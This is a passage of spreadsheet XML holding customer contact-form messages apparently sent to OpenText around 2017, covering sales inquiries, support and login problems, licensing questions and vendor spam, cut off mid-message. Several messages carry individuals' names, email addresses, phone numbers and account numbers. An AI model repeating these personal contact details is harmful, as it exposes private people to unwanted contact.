Wir bereiten zur Zeit eine „Short List“ bzgl. einer dynamischen (Algorithmus basierten) Forecast / Allokation – Lösung vor._x000D_
_x000D_
In diesem Zusammenhang  würden wir uns über Ihr Produktportfolio und über Listenpreise mit Rückmeldung bis zum 31.05.2017 _x000D_
an Simone Ritter (simone.ritter@adler.de) sehr freuen._x000D_
_x000D_
Vielen Dank._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
_x000D_
i.V. Thomas Rothe_x000D_
_x000D_
BRL Supply Chain Management_x000D_
_x000D_
Tel.:  +49 (0) 6021 633 1762_x000D_
Fax.: +49 (0) 6021 633 8762_x000D_
_x000D_
eMail:       thomas.rothe@adler.de _x000D_
Internet: www.adlermode.com_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Michael Tsaryok, I'm representing solutions infrastructure architecture function in the US based EngagePoint software development company._x000D_
_x000D_
We are currently looking for the reporting and analytics solution options to include into our commercial products and solutions._x000D_
_x000D_
Could you please provide us with the price sheet and license type(s) of the available options for using/integrating the iHUB based Reporting and Analytics solution into our commercial products?_x000D_
_x000D_
Thank you very much!_x000D_
_x000D_
Kind regards,_x000D_
Michael</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
_x000D_
we get bills (Number DE100023270/DE100023944/DE100024611) from your Company (customer number DE01-90290000). _x000D_
But the contract was already terminated at the end of the year 2016._x000D_
Please clarify the procedure and give us a Feedback._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Christiane Wolf_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ANX is now OpenText. Could you please tell me if your Company Name is still "only" OpenText Corporation" or "Open Text ANX..."?_x000D_
I'm looking Forward to Hearing from you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Supporters,_x000D_
_x000D_
My company is considering to install your product Brava Desktop 7 for our up-coming projects._x000D_
_x000D_
Could you please help me to reply the following questions:_x000D_
_x000D_
(1) If we purchase one (1) license, how many PC can be installed the software and working simutanously?_x000D_
_x000D_
(2) What is the duration of 1 license? Is it monthly or annual based?_x000D_
_x000D_
(3) Please inform the licence fee and the maintenance fee (if any)?_x000D_
_x000D_
Thank you for your time. </t>
  </si>
  <si>
    <t>Need access to the system for a demo</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo OpentText Team,_x000D_
_x000D_
ich kann leider nicht an mein Gupta-Portal zugreifen._x000D_
http://www.guptatechnologies.com/Services/egls-portal.aspx_x000D_
_x000D_
Ich bitte um Hilfe._x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Dipl.-Ing. Igor Pewsner_x000D_
_____________________________________x000D_
Informationstechnikzentrum Bund (ITZBund) _x000D_
_x000D_
- Referat IV A 1 / Technische Beschaffungssteuerung -_x000D_
       _x000D_
Postanschrift: Postfach 30 16 45, 53196 Bonn_x000D_
_x000D_
Hausanschrift :_x000D_
Informationstechnikzentrum Bund (ITZBund) _x000D_
Wilhelm-Fay-Straße 11_x000D_
65936 Frankfurt am Main_x000D_
_x000D_
Tel.: 022899/680-7669_x000D_
Internet: http://www.ITZBund.de_x000D_
</t>
  </si>
  <si>
    <t>I'm from the auto division where we operate dealerships across Europe and AP. I would like to learn more about the OpenText suite and how it can help in managing content for our digital consumer channels. Thanks.</t>
  </si>
  <si>
    <t>Hi, I'm conducting a software evaluation for a mine site.  We have about 1 million documents, but are wanting to run a trial for a document management system primarily for Safety, (covering policies, procedures, manuals, work instructions, forms) with an estimated 85,000 documents.  Obviously of the 85,000 a lot of duplication needs to be tidied up and archived.  I've been looking through your website but have not found a specific area that covers it, although some of the videos cover general reference to similar EDMS content.  (Stage II for the mine would need to include drawings / P&amp;IDs).  I'd also like to clarify where the documents would be situated, cloud-vs-servers (preferably on-site servers).  How long would an installation / implementation be expected to take.  How long does training usually take for end-users.  I also need to have a general estimation of fees and charges (based on both 1Million and the 85,000 documents) and any other costs (ball park estimate).  The mine site has been in operation for 20 years, and we are working to achieve ISO 18001 certification early 2018._x000D_
Please give me a call _x000D_
Cheers_x000D_
Jan</t>
  </si>
  <si>
    <t>I have a problem with the birt report,that how can I use the pageNumber and totalPage in layout.Both of them returns 1..</t>
  </si>
  <si>
    <t xml:space="preserve">Hi my customer Cleco Corporation recently licensed OpenText solutions thru SAP. I understand they can download initial software from SAP Service Marketplace, but require an account on the OpenText portal to access patches and documentation.   Would you please send instructions on how to set this up?  I will pass these  on to Cleco.    Thanks </t>
  </si>
  <si>
    <t>Need to discuss upgrade of our current fax solution.</t>
  </si>
  <si>
    <t>I'm trying to register my software, however the e-mail address that was in the Register Imaging box does not seem to work.  I thought it was Register14W@global360.com.  Maybe I have the incorrect e-mail address to register.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to do a verification of employment. Please provide the contact information for me to complete this. Thank you </t>
  </si>
  <si>
    <t>we are interested in an OpenText Email2EDI/Fax2EDI solution; approx. 23,000 documents per year from 10 customers_x000D_
We have EDI on our end, these customers don't</t>
  </si>
  <si>
    <t>Curious about pricing for the CRO/optimization of the following?_x000D_
_x000D_
http://online.nl.edu/_x000D_
http://brenaudegree.com/_x000D_
http://judsondegree.com/_x000D_
http://tmcdegree.com/_x000D_
http://www.hustontillotson-adultdegrees.com/_x000D_
http://helixeducation.com_x000D_
_x000D_
Thanks!_x000D_
Eric</t>
  </si>
  <si>
    <t>Interested in your Accessibility Output Platform</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
We are using Captiva 6.5 + Documentum 6.5  for our content management services. We are checking options, to upgrade to latest suggested software (if required)._x000D_
_x000D_
We would like to work with you, to understand the estimated effort (time and cost), to upgrade from our current version to your latest suggested version._x000D_
_x000D_
Would appreciate your response._x000D_
_x000D_
Regards_x000D_
Punitha</t>
  </si>
  <si>
    <t>Need technical support for PixTools software development issue and not sure who to contact nowadays for this support?</t>
  </si>
  <si>
    <t>Recurrence of support issue 2994648</t>
  </si>
  <si>
    <t>My newly purchased helix5DI gps turns itself off after 10 minutes of operation. What is the remedy</t>
  </si>
  <si>
    <t>I'd like to receive marketing emails. Please opt me in.</t>
  </si>
  <si>
    <t>Looking for information on document management.</t>
  </si>
  <si>
    <t>Our old point of contact for OpenText, Philip Berry, for the Chattanooga heart institute left the organization.  He was working with a charm(sp?) tech on an XML file. They were contacting me saying they sent the file but I am unable to get into his account to receive it. Is there anyway I can get that xml file forwarded to triley@chattanoogaheart.com that was sent to pberry@chattanoogaheart.com</t>
  </si>
  <si>
    <t>We are currently using Captaris FaxPress version 6.0.2003.3 and the fax printer feature doesn't work in Windows 7-64bit or Windows 10. I was wondering if you have newer drivers we can download. Thanks, Diego</t>
  </si>
  <si>
    <t>Boa tarde._x000D_
Gostaria de saber se a empresa oferece algum tipo de treinamento de OpenText TeleForm  para empresa._x000D_
Att,_x000D_
Marluce.</t>
  </si>
  <si>
    <t>I cannot get the Alchemy Search to install.  It reports an error of "unable to marshall interface"  thank you. _x000D_
_x000D_
Sarah Kurth</t>
  </si>
  <si>
    <t xml:space="preserve">Hello there, _x000D_
_x000D_
I am the global trade compliance analyst for Raytheon. _x000D_
_x000D_
I’m contacting your company to request the Export Control Classification Number (ECCN) for the IGC Myriad 8.1. _x000D_
ECCNs are five character alpha-numeric designations used on the Commerce Control List (CCL) to identify dual-use items for export control purposes. An ECCN categorizes items based on the nature of the product, i.e. type of commodity, software, or technology and its respective technical parameters. They are used in determining whether an export license is needed from the Department of Commerce._x000D_
If you are unable to provide the ECCN, could you please provide the following information: _x000D_
1)	Is there any encryption utilized within the software? _x000D_
2)	Is there a log on/authentication process utilized to access the software? _x000D_
3)	If encryption, can it be changed easily by the user? _x000D_
_x000D_
If you are unaware of your ECCN for this product, please forward this email to your legal department. _x000D_
_x000D_
Your immediate response is very much appreciated. _x000D_
_x000D_
Thanks in Advance, _x000D_
</t>
  </si>
  <si>
    <t>Need to setup new account for Catalogue access.</t>
  </si>
  <si>
    <t>- No Access to "My Support Area"_x000D_
- Need to define new responsible persons on K+S Side</t>
  </si>
  <si>
    <t>I teach the Records and Information Management course at College of the North Atlantic in St. John's, NL.  As we are currently going through program review, I am looking to implement more electronic records into the course.  I am wondering if Open Text has an educational version of an EDMS that we are able to use in the classroom._x000D_
_x000D_
Sincerely,_x000D_
Lisa Gambin</t>
  </si>
  <si>
    <t xml:space="preserve">Requesting process for Returning Modem </t>
  </si>
  <si>
    <t>i want to know is there any tool or application which can create, modify &amp; approve documents in the electronic form throughout drug life cycle like Change management, CAPA management, Qualification &amp; Validation related documents as per regulatory formats?</t>
  </si>
  <si>
    <t>Looking for prices for OpenText Exceed and NFS Server.  We are currently using Hummingbird Exceed 2007 and Allegro NFS Server 4.5.  We are upgrading to Windows 10 so need to upgrade these products as well.</t>
  </si>
  <si>
    <t>We are attempting to obtain VAN service to transmit EDI data to our customer.  Can someone please contact us as soon as possible?_x000D_
_x000D_
Thanks,_x000D_
John Fox</t>
  </si>
  <si>
    <t>Researching replacements for antiquated hardware.</t>
  </si>
  <si>
    <t>I need to obtain a verification of employment for one of your employees.</t>
  </si>
  <si>
    <t>I'm a developer and I could use the driver for the "Gupta Dataservice DBintergrator for ODBC client" for a 64-bit system</t>
  </si>
  <si>
    <t>I would like to see a demo of the OpenText Document Management solution.</t>
  </si>
  <si>
    <t>Please send certificates for Stefan Alaksa, Zdenek Bohdanecky for attending course 3-0702 Archive Server Advanced Administration (formerly 715) on April 19-21 to the company address_x000D_
IXTENT s.r.o._x000D_
Jankovcova 14_x000D_
170 00 Praha 7, CZ_x000D_
_x000D_
or at least as pdf to attendees' emails._x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo OpenText Team,_x000D_
_x000D_
Zugang zu dem Gupta Portal ist nicht mehr da._x000D_
Link: http://www.guptatechnologies.com/Services/egls-portal.aspx_x000D_
_x000D_
Bitte mit mir in Kontakt treten, damit den Zugang wiederhergestellt werden kann._x000D_
_x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Dipl.-Ing. Igor Pewsner_x000D_
_____________________________________x000D_
Informationstechnikzentrum Bund (ITZBund) _x000D_
_x000D_
- Referat IV A 1 / Technische Beschaffungssteuerung -_x000D_
       _x000D_
Postanschrift: Postfach 30 16 45, 53196 Bonn_x000D_
_x000D_
Hausanschrift :_x000D_
Informationstechnikzentrum Bund (ITZBund) _x000D_
Wilhelm-Fay-Straße 11_x000D_
65936 Frankfurt am Main_x000D_
_x000D_
Tel.: 022899/680-7669_x000D_
Internet: http://www.ITZBund.de_x000D_
</t>
  </si>
  <si>
    <t>WSSC owns an Actuate BIRT System which I believe is now part of OpenText.  I am interested in learning if this is, indeed, true and if so, I am interested in speaking with an account representative.</t>
  </si>
  <si>
    <t>Hi there.._x000D_
_x000D_
I recently have been using your product (HP Exstream) for a while now and currently I'm facing a bit technical difficulties regarding ActiveMQ and Command Center._x000D_
I already contacted one of your support named, Callitus and I've opened a ticket in your website (to be honest, I think I have opened a ticket, because I'm not quite sure how this ticketing works). My ticket number I just opened is 3037127._x000D_
_x000D_
Can you help me to contact one of your support or at least send me a guide how this support works, because I kinda really need your support regarding this techincal dificulties ASAP._x000D_
_x000D_
Thank you for your help._x000D_
_x000D_
Many thanks before.</t>
  </si>
  <si>
    <t>Hi, I am interested for the BPM platform. How can I get a demo or a trial version? Thank you</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
I am trying to use your .dwg viewer but so far it blocks on every drawing I open (1,5-1,8 Mb). In this way I can't even try it._x000D_
Please give your suggestion, thanks in advance._x000D_
Best regards,_x000D_
Ben Braakman</t>
  </si>
  <si>
    <t>Hi,  I'm looking at your solution called OpenText Employee File Management for SAP® Solutions. _x000D_
_x000D_
Can you tell me if this is available as a SAP Fiori application ?_x000D_
_x000D_
br Thomas</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I work for a Company that runs the Public Transportation in a big city of Romania and I am interested in using BIRT as a reporting tool for our company. In order to obtain funds for this from the company, I need to present a realistic cost estimate to the Managers. Can you please provide some information about the cost and the options of licensing you offer._x000D_
_x000D_
Thank you very much._x000D_
Regards,_x000D_
Anca David_x000D_
</t>
  </si>
  <si>
    <t>Loss of log on and password</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
_x000D_
die BMW Group ist aktuell auf der Suche nach einem geeigneten DAM System. Wir haben bereits eine Vorauswahl von mehreren Anbietern getroffen und in der ersten Runde haben wir uns unter anderem auch für OpenText Media Management entschieden. Ich hätte daher gerne einen Ansprechpartner von Ihrer Seite der eine Anbieterpräsentation für die BMW Group vorbereiten kann. Ich wäre ihnen sehr dankbar, wenn Sie mir einen Kontakt zukommen lassen könnten. _x000D_
_x000D_
Vielen Dank und Gruß,_x000D_
_x000D_
Susanne Huber_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">While performing checkout operation in documentum webtop , we are receiving below error, please help us with this issue._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need Sale and Presale team contact details in India for opportunity in SAP Archiving Solution</t>
  </si>
  <si>
    <t>Wpłaciłem 179 pln i nie mam licencji na avasta-  wplata P24-J53-341-909</t>
  </si>
  <si>
    <t xml:space="preserve">kindly we are consultant company and one of our client use open text livlink, and 10 people from our staff will work on this software, therefore please provide quotation  for the training will be required for our staff to be able to provide system support to our staff and to work on this software in professional way. </t>
  </si>
  <si>
    <t>We are resellers and IT solution providers in India. one of our client has requirement for Open text training.please do let me know your partners in India who can give training for this.</t>
  </si>
  <si>
    <t>Need urgent assistance with Integrator 5 as our EDI orders have not been received today, Dexter  Mayao has previously worked on our integrator and assisted with all queries.</t>
  </si>
  <si>
    <t>I'm interested in your content management solution. Please send me about your partner or your distributor in Thailand.</t>
  </si>
  <si>
    <t>New company requiring a document management system to control Company Management system documents and Project construction (Offshore rig construction in shipyard) documents.</t>
  </si>
  <si>
    <t>Looking for information about an ESA connector for a Ricoh 501 (SOP) with android control panel. Any info please.</t>
  </si>
  <si>
    <t>I have an Easy Link account, my customer number is 0000000066216.  I am trying to log in to manage my fax numbers, but I'm not able to.  Can you help?  Thank you!</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
My name is Lauren Masterson and I'm the Marketing Manager for Postcreatives. We're an award-winning video production company located just around the corner from you in Asbury Park, NJ. _x000D_
_x000D_
I wanted to reach out and see if we would be a good fit for any of your video marketing needs. You can view some more of our past work in this presentation (https://adobe.ly/2jbUEmo) and on our website (www.postcreatives.com). _x000D_
_x000D_
Are you available next week to have a quick chat? _x000D_
_x000D_
Thanks,_x000D_
Lauren</t>
  </si>
  <si>
    <t>Does opentext integrate with NetSuite faxing system?</t>
  </si>
  <si>
    <t>Hi, I act as consultant for law firms. As part of a mandate I am required to provide information about Opentext eDOCS ECM.  Would it be possible to obtain the complete details of contact person and a pricing for the deployment of Opentext eDOCS ECM in a Luxembourg based law firm counting  11 fee earners. Many thanks in advance for your assistance. Kind regards, Benoit CHARPENTIER</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to cloud alternatives for replacing a 10 line system on premise solution. </t>
  </si>
  <si>
    <t>Please tell me your e-fax service price list._x000D_
_x000D_
_x000D_
P.S._x000D_
Your site has security risks._x000D_
Company* text box automatically list your client._x000D_
* This is not my past type lists.</t>
  </si>
  <si>
    <t>Would like information on OpenText Legal.</t>
  </si>
  <si>
    <t xml:space="preserve">Re: Criminal Record/Security Checks – New Hires_x000D_
 _x000D_
Would you kindly direct me to the appropriate department that oversees the requirement for security record checks – new employees. _x000D_
 _x000D_
Thank you so very much._x000D_
 _x000D_
Steve_x000D_
 _x000D_
 _x000D_
Are your security checks CPIC  based?_x000D_
CPIC. The Canadian Police Information Centre (CPIC) is the central police database where Canada's law enforcement agencies can access information on a number of matters. It is Canada's only national law enforcement networking computer system ensuring officers all across the country can access the same information._x000D_
 _x000D_
 _x000D_
About Us_x000D_
For over 20 years Alps Security have been providing security services to Canadians. Alps is a diverse company offering a variety of security services and installations. _x000D_
 _x000D_
Some of our services include_x000D_
 _x000D_
•	Criminal record checks_x000D_
•	Loss prevention_x000D_
•	Investigation _x000D_
•	Consultation_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">The leader in layoffs, and more to come. </t>
  </si>
  <si>
    <t>Interested in learning more about you Document Capture &amp; Recognition Software.</t>
  </si>
  <si>
    <t>Learn Technical Details about Captiva and Documentum Products. S3 Compatibility of Documentum and ability to write to multiple volumes.</t>
  </si>
  <si>
    <t>Looking to automate Faxes and emails and create sales orders for JD Edwards E1.  Please let me know if your product will support this.</t>
  </si>
  <si>
    <t xml:space="preserve">AAA MountainWest is merging with AAA NCNU and we are looking for a completed W-9 form and to see if there is a signed contract/agreement with your company for account WVST522376. Please contact me either by email or give me a call at your soonest convenience. Thank you for your assistance. </t>
  </si>
  <si>
    <t>May need to maintain an existing TD / SqlBase app.  How much does a single developer seat cost?</t>
  </si>
  <si>
    <t>Looking for a way to export a full list of users (preferable in .csv or .xlsx), for the purpose of deleting unused accounts</t>
  </si>
  <si>
    <t>I have questions about 2 training courses you offer: 2-0113 and 2-0114. Are these both available in the virtual classroom? Are they delivered via WebEx? Do they come with a manual? I am also looking to price this training on-site.  Thank-you.  Carol</t>
  </si>
  <si>
    <t>I would like to speak with someone about becoming a partner with OpenText. We are a 3pl provider with an in-house IT team and frequently work with customers that use your product. I'm hopeful that we can try and join forces and come up with a solution that would benefit us both! Let me know if you're interested in discussing some options? Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I would like price and purchase information for OpenText™ Redact-It™ Enterprise.  We have a client who would like to quickly move forward with this order.  They are requesting a qty of 2.  Thank you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My customer has a RighFax solution at version 9.3.2.665, and we would like to refresh the hardware and software to the latest version if required. I would like to have more information on what is needed._x000D_
_x000D_
This is an urgent request as it is part of an RFP due next week. Please let me know who is the account rep for Bell Canada, and provide me with technical sales contact information to discuss licensing and a Professional Services Quote._x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
This is just a quick email to check whether you have any requirement of various Manufacturing process management software users._x000D_
_x000D_
We are B2B database provider and have complete contact information of various decision makers with titles IT, Manufacturing, Finance, Engineers, CEO, Owner, VP etc._x000D_
_x000D_
We cover all industries i.e. Chemicals, Pharmaceuticals, Food and beverages, Manufacturing, Transportation &amp; Logistics and Gasoline and many more._x000D_
_x000D_
Kindly revert back with your requirements so that I can provide you few samples for your reference._x000D_
_x000D_
Regards,_x000D_
Peter Thomas | Marketing Manager_x000D_
The List Box_x000D_
peter@thelistbox.com_x000D_
www.thelistbox.com</t>
  </si>
  <si>
    <t xml:space="preserve">looking to connect with a resource to share our requirements for a content management platform in order to see if Open Text solution can meet our needs. </t>
  </si>
  <si>
    <t>Hi, a customer has bought Ricoh MP C2011SP, but now wants send and receive Fax. Can you explain how it works "Fax Connectors for Ricoh MFPs" and tell me if this MFP is supported?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Trying to reach Adam Howatson. OAUG has launched a new weekly eNewsletter called 'OAUG Insider' that I help manage. I wanted to know if OpenText is going to be interested in booking a space. We're currently booking space in advance on a first come first served basis.</t>
  </si>
  <si>
    <t>May you furnish me with information required for a company to be Open text certified.</t>
  </si>
  <si>
    <t xml:space="preserve">On behalf of the Scientific Committee organizing the International Congress of Actuaries event being held in Berlin June 2018, we would like to invite Tom Jenkins to be a key speaker. Tom's expertise in INformation  Management is critical to the effectiveness of our work and this would be to an international audience at an event held only once every four years. I would like to send an invitation with some material by e mail. PLease give me an address. WE would be happy for Tom to craft his presentation for this audience as he sees best and are flexible with the topic. Regards, Cathy </t>
  </si>
  <si>
    <t>Noticed in an industry report that you mentioned OpenText had pre-built support and templates for ISO Forms. Wanted to gain a better understanding of how you support ISO Customers.</t>
  </si>
  <si>
    <t xml:space="preserve">I need a support quote/contract for 24x7 Rightfax on Premise support. I need asap. I have emailed James L a couple time with no response. </t>
  </si>
  <si>
    <t>Gostaria de saber mais sobre a solução de Portal de Gestão de Conteúdo (CMS). Sou da área de TI do Sistema Fecomércio do RJ e estamos interessados na contratação desse tipo de solução._x000D_
Favor entrar em contato.</t>
  </si>
  <si>
    <t>Looking to evaluate solutions for ECM and eventually provide a quote to leadership on implementing a solution.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm trying to install your free version of dwg viewer on my win 7 pro. it is not working. (installation problem)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I see that you are looking for developers. I can provide you with any specific professional you need._x000D_
I would like to hop on a quick call with you and discuss outsource solution. _x000D_
Do you have time to talk today? We are ready to meet you at any convenient time. _x000D_
Please contact me as soon as you are available: +1 646 751 76 06 _x000D_
Best regards, Olga </t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are interested in more information on your automation solutions as we are considering an external solution for sales order automation for the EMEA business._x000D_
_x000D_
We have a non-standard ERP system, but it is capable of receiving orders as EDI XML messages or flat text files (in a custom format)._x000D_
_x000D_
Would you be ready to present to us some general demo of your solution? Probably a web and phone conference would be the most suitable way to do it._x000D_
_x000D_
_x000D_
Best regards,_x000D_
Jacek Juda_x000D_
_x000D_
______________________________________x000D_
Jacek Juda_x000D_
e-Business Leader_x000D_
Business Information Management _x000D_
International Paper, Kraków, Poland _x000D_
Tel: +48 12 252 6973 | +48 602 488 949_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are a consultant company with strong partnership with Microsoft. In our communication with customers we frequently use a picture that explains Office 365 and possible integrations with other applications. Up to now we have had an EMC-Documentum logotype in that picture, to illustrate the possibility to integrate with document management systems. We request the right to use the OpenText logotype._x000D_
_x000D_
Best regards,_x000D_
Anna Guldstrand</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
we are facing issues to manage our company account (eswiniarski@filhetallard.com) in your system._x000D_
When we want to access Support pages, it always says : "No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process."_x000D_
_x000D_
Even after requesting validation email, we still have the issue._x000D_
Could you "unlock" our account please?_x000D_
_x000D_
Regards,_x000D_
Jean-Michel MAISONNAVE_x000D_
FILHET-ALLARD_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">hi as I install the product what i buy (Brava! Desktop DXP_x000D_
Product Version: 16.2) and follow all steps form your mail but is always show the page : _x000D_
_x000D_
https://login.opentext.com/connect/sso_controller-profile?sys_action=sso_noperms_kc_css_x000D_
_x000D_
can you please hurry take this problem for me / I can do works without Brava_x000D_
thank you_x000D_
</t>
  </si>
  <si>
    <t>Licensproblem for Gupta/Centura 3.1</t>
  </si>
  <si>
    <t>We are scoping solutions for an integration layer to help streamline multiple cloud based and on premise solution systems to feed into our data visualisation tool.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Elsner Technologies Pvt. Ltd.,is a web development and design company, with its highly skilled and proficient employees based in Switzerland, UK, Australia, US as well as in India having an experience of a decade in the IT field._x000D_
_x000D_
We believe in long term and successful business relationship with our clients and hence have always been on the move for boosting and inspiring consecutive learning and training which is a prominent factor corporate culture. With the knack of understanding and perceiving the belief of our client, we have been successfully delivering them solutions accordingly._x000D_
_x000D_
FOLLOWING ARE SOME OF OUR TRAITS-_x000D_
“Magento Certified Programmer” is an icing on the cake._x000D_
We provide 2 days free trial for Magento services to evaluate our outstanding services._x000D_
Capable of providing dedicated resources for “Magento"_x000D_
Enjoy our services and remarkably lessen the cost of Magento development._x000D_
We have a validate track record and are dedicated for committed timely delivery providing quality with international standard._x000D_
Kindly feel free to discuss anything related to business prospects. _x000D_
_x000D_
Thanking You_x000D_
Hiren Jayswal</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to download the latest version of Open text SAP connector / SAP Portal Site Management by OpenText._x000D_
Could you please inform us where I can find the required installation files and configuration instructions?_x000D_
Thank you_x000D_
Kostas Tsitlikas_x000D_
</t>
  </si>
  <si>
    <t>Looking for a US based email to fax solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
I am interested to find out more information regarding OpenText's platform for SMS marketing. We currently have an active account with OpenText (Login ID AU/VR984649), but have not used in a while and I am not so familiar with its capabilities. _x000D_
We require a platform to receive SMS, more so than send. Basically, we need a number for people to send a keyword to (could be their name), inviting us to then contact them over the phone. _x000D_
More specifically, this is a number we will be advertising for people to send an SMS to. Once someone sends an SMS, we want this SMS to be re-directed to an email address where a team (on the other end of that e-mail address) will then action it._x000D_
I imagine we will be able to view the incoming SMS in OpenText, but can these SMS’s also be re-directed to an email address, allowing someone who is not logged in to the OpenText account to view?_x000D_
Could you please send through the price list for this number? Is it a case of hiring the number for a period of time, or is the cost calculated per SMS sent/received?_x000D_
Lastly, are you an Australian based company and where is your database located? Any information, including costs and set-up instructions would be much appreciated._x000D_
Thank you in advance._x000D_
Kindest regards,_x000D_
Stan_x000D_
</t>
  </si>
  <si>
    <t>Need Brava! Desktop 10 user, Image only for our customer. Please contact asap</t>
  </si>
  <si>
    <t xml:space="preserve">Introduction email – Lockhart Accounting Office in Tokyo_x000D_
_x000D_
Dear Sir/Madam,_x000D_
_x000D_
Greetings!_x000D_
_x000D_
I would like to take an opportunity and introduce our firm Lockhart Accounting Office in Tokyo. Lockhart Accounting Office is an accounting firm specializing in accounting and tax for small and medium businesses here in Japan. In addition, we have the manpower of an experienced Japanese CPA and English-Japanese bilingual Filipino._x000D_
_x000D_
We have a well-established track record and our services have always met with great customer satisfaction. We offer services such as:_x000D_
•	Bookkeeping_x000D_
•	Tax_x000D_
•	Payroll_x000D_
•	Visa Application_x000D_
•	Data Entry outsourcing_x000D_
We promise to support international companies with full power so that everyone will succeed in the Japanese Market. Please feel free to contact us for any questions relating to our business that might be unclear. Kindly visit our website http://lockhart.co.jp/en/ for more details.	_x000D_
_x000D_
Thank you for your time and consideration. We are looking forward to a wonderful business relationship together._x000D_
_x000D_
Sincerely yours,_x000D_
_x000D_
Akinari Tsuchiya_x000D_
President, Lockhart Accounting Office_x000D_
Tokyo, Japan_x000D_
_x000D_
By: Jonel Yalong _x000D_
</t>
  </si>
  <si>
    <t>Need more info on Cloud Fax functions.</t>
  </si>
  <si>
    <t>Dear Partner,_x000D_
_x000D_
Hope this email finds you well._x000D_
_x000D_
With the increased in our sms traffic over the past 6 months, we are now a_x000D_
mid-tiered sms aggregator. As such we are able to offer Direct sms route_x000D_
at wholesaler price to our clients. Effective 1 May 2017, we will reduce_x000D_
the following Destination Direct Routes Rates. Based on your traffic_x000D_
volume, potentially you would save thousand$ per month._x000D_
_x000D_
Country        Cost/sgd        Features_x000D_
Singapore        0.0295        Direct Route Full Features_x000D_
Direct-To-Telcos connection to SingTel, M1 and Starhub_x000D_
Australia        0.0387        Direct Route Full Features_x000D_
Brunei        0.0140        High Quality Route_x000D_
Canada        0.0170        Direct Random numeric local sender_x000D_
China        0.0152        Direct Route Pre-registration of SMS content_x000D_
Germany        0.0880        Direct Route Full Features_x000D_
Indonesia        0.0266        Direct Route Pre-registration of sender id_x000D_
Japan        0.057              Direct Route Full Features_x000D_
Laos        0.0530        Direct Route Full Features_x000D_
Malaysia        0.022           Direct Route 5-digit short code sender id_x000D_
Myanmar        0.0623        Direct Route Full Features_x000D_
Netherlands        0.0880        Direct Route Full Features_x000D_
New Zealand        0.0770        Direct Route Full Features_x000D_
Philippines        0.0106        Direct Route Full Features_x000D_
South Korea        0.0215        Direct Route Full Features_x000D_
Thailand        0.0148        Direct Route Full Features_x000D_
Vietnam        0.0266        Direct Route Random numeric sender id_x000D_
Cambodia        0.02508        Direct Route Random numeric sender id_x000D_
_x000D_
Thank you._x000D_
Richard Tan</t>
  </si>
  <si>
    <t xml:space="preserve">Did not get any download link in email after filling up the prescribed form despite several attempts. Seeking for assistance to get a download link for Free Brava! Dwg Viewer version 16.2_x000D_
Link: http://www.opentext.com/what-we-do/products/enterprise-content-management/content-centric-applications/try-it-now/free-brava-dwg-viewer </t>
  </si>
  <si>
    <t>Need to order 1 x CXL license cost is $145 US - http://store.infograph.com/store/scripts/brava.asp _x000D_
_x000D_
Our customer is Coventry Homes.</t>
  </si>
  <si>
    <t>I am a purchasing agent for Boeing and am getting ready to send out a Request For Information. Prior to doing so, I need to send your company a two-way Proprietary Information Agreement and need a point of contact. Can you please respond ASAP? Thank you.</t>
  </si>
  <si>
    <t>Hi.  I'd like some technical information on how to best build a system to interface well with Documentum in a GMP-Regulated Life Science Environment.  One of our products at Vaisala is data collection system to help life science companies show that their products have been stored at the correct temperature and humidity.  I'd like to make sure that our system outputs and file formats are easily compatible with a system like Documentum._x000D_
_x000D_
I look forward to speaking with you.</t>
  </si>
  <si>
    <t>I need to see if there is a way to setup the installation for Fax2Mail and the associated Virtual Fax machine setup as a silent install through WSUS and a GPO. Do you all have any instructions on the commands for this?</t>
  </si>
  <si>
    <t>Issues with VIP DocManager</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I just wanted to check would you be interested to acquire email list of CIOs/CTOs, IT decision makers/Influencers, Cloud users, Customer Care Professionals, Contact Center Decision Makers from your target region_x000D_
                    _x000D_
If so please let me know your target audience, I will get back to you with the counts and few sample contacts for your review_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We subscribed to a 30-day trial version of RightFax v10.6, downloaded the rf106.iso (2x) and almost immediately after launching the setup.exe, the process completes.  An installation log file reports, in part:  _x000D_
"2017-05-15 08:45:31Z: Info: Logging started._x000D_
2017-05-15 08:45:31Z: Info: Setup v10.6.0.330_x000D_
